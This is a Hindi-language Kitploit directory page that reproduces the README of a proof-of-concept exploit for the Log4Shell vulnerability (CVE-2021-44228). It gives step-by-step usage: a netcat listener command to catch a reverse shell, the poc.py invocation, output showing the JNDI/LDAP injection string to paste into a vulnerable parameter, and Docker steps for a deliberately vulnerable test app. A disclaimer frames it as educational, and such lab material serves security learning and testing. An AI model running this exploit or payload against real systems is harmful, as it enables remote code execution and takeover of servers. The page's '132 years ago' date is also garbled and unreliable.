Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44228-demo — CVE-2021-44228 (Log4Shell) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जिसमें स्वचालित LDAP/HTTP सर्वर सेटअप और शैक्षिक परीक्षण के लिए रिवर्स शेल पेलोड जनरेशन शामिल है। | Kitploit
उपकरण/GitHubGitHub/hoanle396/cve-2021-44228-demo
पेलोड जनरेशनभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubhoanle396/cve-2021-44228-demo

CVE-2021-44228-demo

CVE-2021-44228 (Log4Shell) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जिसमें स्वचालित LDAP/HTTP सर्वर सेटअप और शैक्षिक परीक्षण के लिए रिवर्स शेल पेलोड जनरेशन शामिल है।

रिपॉजिटरी देखें
132 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

log4j-shell-poc

हाल ही में पाई गई CVE-2021-44228 भेद्यता के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट।

हाल ही में log4j में एक नई भेद्यता पाई गई, जो एक Java लॉगिंग लाइब्रेरी है जो elasticsearch, minecraft और कई अन्य जगहों पर व्यापक रूप से उपयोग की जाती है।

इस रिपॉजिटरी में एक उदाहरण के रूप में असुरक्षित एप्लिकेशन और इसका प्रूफ-ऑफ-कॉन्सेप्ट (POC) एक्सप्लॉइट मौजूद है।

प्रूफ-ऑफ-कॉन्सेप्ट (POC)

PoC के रूप में एक Python फ़ाइल है जो इस प्रक्रिया को स्वचालित करती है।

आवश्यकताएँ:

root@kitploit:~
pip install -r requirements.txt

उपयोग:

  • रिवर्स शेल कनेक्शन स्वीकार करने के लिए netcat लिसनर शुरू करें।
root@kitploit:~
nc -lvnp <netcat-port=example=2034>
  • एक्सप्लॉइट लॉन्च करें।
    नोट: यह काम करने के लिए, निकाले गए Java आर्काइव का नाम jdk1.8.0_20 होना चाहिए, और वह उसी निर्देशिका में होना चाहिए।
root@kitploit:~
$ python3 poc.py --userip <your-ip-address> --webport <web-server-port=default=8000> --lport <netcat-listen-port=default=2034>

[!] CVE: CVE-2021-44228

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://<your-ip-address>:1389/a}

Listening on 0.0.0.0:1389

यह स्क्रिप्ट आपके लिए HTTP सर्वर और LDAP सर्वर सेटअप करेगी, और यह एक पेलोड भी बनाएगी जिसे आप असुरक्षित पैरामीटर में पेस्ट कर सकते हैं। इसके बाद, यदि सब कुछ ठीक रहा, तो आपको lport पर एक शेल मिल जाना चाहिए।


असुरक्षित एप्लिकेशन

इसमें असुरक्षित वेब ऐप के साथ एक Dockerfile है। आप नीचे दिए गए चरणों का पालन करके इसका उपयोग कर सकते हैं:

root@kitploit:~
1: docker build -t log4j-shell-poc .
2: docker run  -p 8080:8080 log4j-shell-poc

एक बार यह चलने के बाद, आप इसे localhost:8080 पर एक्सेस कर सकते हैं।


Java संस्करण प्राप्त करना।

नोट: पैकेज डाउनलोड करने में सक्षम होने के लिए आपको एक खाता बनाना आवश्यक है।

आर्काइव डाउनलोड और निकाल लेने के बाद, आप jdk1.8.0_20/bin में java और कुछ संबंधित बाइनरी पा सकते हैं।
नोट: यह काम करने के लिए jdk फ़ोल्डर को इसी नाम के साथ इस रिपॉजिटरी में निकालना सुनिश्चित करें।

root@kitploit:~
❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)

अस्वीकरण

यह रिपॉजिटरी CVE-2021-44228 के लिए एक-क्लिक एक्सप्लॉइट होने के इरादे से नहीं है। इस परियोजना का उद्देश्य लोगों को इस भेद्यता के बारे में सीखने में मदद करना है, और शायद अपने स्वयं के अनुप्रयोगों का परीक्षण करना है (हालाँकि इस उद्देश्य के लिए बेहतर अनुप्रयोग मौजूद हैं, जैसे: https://log4shell.tools/)।

टूल डाउनलोड करें